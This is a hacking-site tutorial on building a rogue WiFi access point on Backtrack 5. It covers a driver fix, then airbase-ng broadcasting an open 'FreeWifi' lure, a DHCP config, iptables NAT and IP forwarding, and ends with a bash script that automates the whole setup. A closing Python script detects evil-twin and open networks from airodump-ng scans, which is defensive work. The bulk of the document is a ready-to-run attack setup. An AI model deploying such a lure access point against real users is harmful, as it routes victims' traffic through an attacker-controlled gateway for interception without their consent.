How to Create a Fake Access Point on Backtrack 5

A rogue access point, or fake access point, is a real threat to WiFi users. Airsnarf (Rogue Access Point) and Karmetasploit (Backtrack 5 Tutorial) have been discussed before; in this article I will share a wonderful tutorial that discusses how to create a fake access point on Backtrack 5. There are a lot of tutorials and scripts for setting up a fake AP; the “Gerix” tool also has an option to set up a fake AP automatically (for some reason this tool never worked for me).
I started to set up my fake AP and ran into some trouble for a strange reason.
I decided to put my experience here; hopefully you'll find it useful.
I started by putting my wlan interface in monitor mode:
root@bt:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           Realtek RTL8187L        rtl8187 - [phy1]SIOCSIFFLAGS: Unknown error 132
                                (monitor mode enabled on mon0)
I noticed the following error: “Unknown error 132”.
I tried using airodump-ng to see what happens…

root@bt:~/fakeap# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Unknown error 132
I got the same error.
The solution was simply to unload the rtl8187 module and load the r8187 driver instead, as follows:
root@bt:~/fakeap# rmmod rtl8187
root@bt:~/fakeap# modprobe r8187
I tried putting wlan1 in monitor mode again:
root@bt:~/fakeap# airmon-ng start wlan1
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID     Name
1558    dhclient
Interface       Chipset         Driver
wlan1           RTL8187         r8187 (monitor mode enabled)
Well, that fixed the problem:
root@bt:~/fakeap# iwconfig
lo        no wireless extensions.
eth3      no wireless extensions.
wlan1     802.11b/g  Mode:Monitor  Channel=10  Bit Rate=11 Mb/s
          Tx-Power=5 dBm
          Retry:on   Fragment thr:off
          Link Quality=0/100  Signal level=50 dBm  Noise level=-156 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
Now we can proceed to the fake AP setup process.
1. Install a DHCP server:
apt-get install dhcp3-server
2. Edit “/etc/dhcp3/dhcpd.conf” as follows (you can change the IP address, pool and DNS server as needed):
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.254;
    option domain-name-servers 8.8.8.8;
    range 10.0.0.1 10.0.0.140;
}
3. Put your wlan interface in monitor mode:
airmon-ng start wlan1
4. Start airbase-ng; you will need to specify the AP SSID and channel number:
airbase-ng -e FreeWifi -c 11 -v wlan1 &
5. Airbase-ng will create a new interface, “at0”. You will need to bring it up and assign it an IP address and subnet mask; the IP address you assign to this interface is the default gateway (option routers) that you specified in dhcpd.conf:
ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
6. Add a route:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254
7. Set up iptables:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
• eth3 is my external interface, which is connected to the internet; change it to whatever yours is:
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE
8. Clear the DHCP leases:
echo > '/var/lib/dhcp3/dhcpd.leases'
9. Create a symlink to dhcpd.pid (skipping this may cause an error when starting the DHCP server):
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid
10. Start the DHCP server:
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
11. Don't forget to enable IP forwarding:
echo "1" > /proc/sys/net/ipv4/ip_forward
That's all, folks!
I have created a simple bash script to automate this process; you will just need to change it to suit your configuration.

#!/bin/bash

echo "Killing airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;

echo "Putting wlan in monitor mode..."
airmon-ng stop wlan1 # Change to your wlan interface
sleep 5;
airmon-ng start wlan1 # Change to your wlan interface
sleep 5;
echo "Starting fake AP..."
airbase-ng -e FreeWifi -c 11 -v wlan1 & # Change essid, channel and interface
sleep 5;

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpd.conf
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

sleep 5;

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE # Change eth3 to your internet facing interface

echo > '/var/lib/dhcp3/dhcpd.leases'
ln -sf /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid # -f so a re-run does not fail if the link exists
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &

sleep 5;
echo "1" > /proc/sys/net/ipv4/ip_forward
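Seen from the defender's side, the setup above leaves two signatures in any airodump-ng scan: an open network with a lure name such as FreeWifi, and (when the attacker copies a real SSID) a known ESSID beaconed from a BSSID that is not one of your access points. The following Python check is an added example, not part of the original post or the Exploit KB tutorial; the airodump-ng CSV column layout is assumed from its export format and every MAC, SSID and timestamp is constructed.

```python
import csv
import io

# Allowlist of the networks you operate: ESSID -> set of authorised BSSIDs (constructed values).
KNOWN_APS = {
    "CorpNet": {"00:11:22:33:44:55", "00:11:22:33:44:56"},
}

# Constructed rows in the shape of the airodump-ng CSV access-point table
# (column order assumed from the airodump-ng CSV export; "OPN" marks an open network).
SCAN_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2012-01-01 10:00:00, 2012-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -40, 120, 0, 0.0.0.0, 7, CorpNet,
AA:BB:CC:DD:EE:FF, 2012-01-01 10:01:00, 2012-01-01 10:05:00, 11, 11, OPN, , , -35, 90, 0, 0.0.0.0, 7, CorpNet,
DE:AD:BE:EF:00:01, 2012-01-01 10:02:00, 2012-01-01 10:05:00, 11, 11, OPN, , , -30, 80, 0, 0.0.0.0, 8, FreeWifi,
"""


def parse_aps(text):
    """Parse the AP table into a list of dicts with whitespace-stripped keys and values."""
    reader = csv.DictReader(io.StringIO(text), skipinitialspace=True)
    return [{k.strip(): (v or "").strip() for k, v in row.items() if k} for row in reader]


def classify(ap, known=KNOWN_APS):
    """Return the findings for one AP record; an empty list means nothing suspicious."""
    findings = []
    essid, bssid, privacy = ap["ESSID"], ap["BSSID"].upper(), ap["Privacy"]
    # Evil twin: our SSID, but the beacon comes from a radio we do not own.
    if essid in known and bssid not in known[essid]:
        findings.append("evil twin: ESSID %s from unknown BSSID %s" % (essid, bssid))
    # Open network: airbase-ng with only -e/-c (as in this tutorial) advertises no encryption.
    if privacy == "OPN":
        findings.append("open network: %r (%s) on channel %s" % (essid, bssid, ap["channel"]))
    return findings


def find_rogue_aps(text, known=KNOWN_APS):
    """Map BSSID -> findings for every AP in the scan that triggers a rule."""
    result = {}
    for ap in parse_aps(text):
        findings = classify(ap, known)
        if findings:
            result[ap["BSSID"]] = findings
    return result


if __name__ == "__main__":
    for bssid, findings in find_rogue_aps(SCAN_CSV).items():
        print(bssid, "->", "; ".join(findings))
```

Point `parse_aps` at the `-01.csv` file `airodump-ng -w` writes to run the same rules over a real survey.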



The overall credit goes to Exploit KB.


Ehacking Staff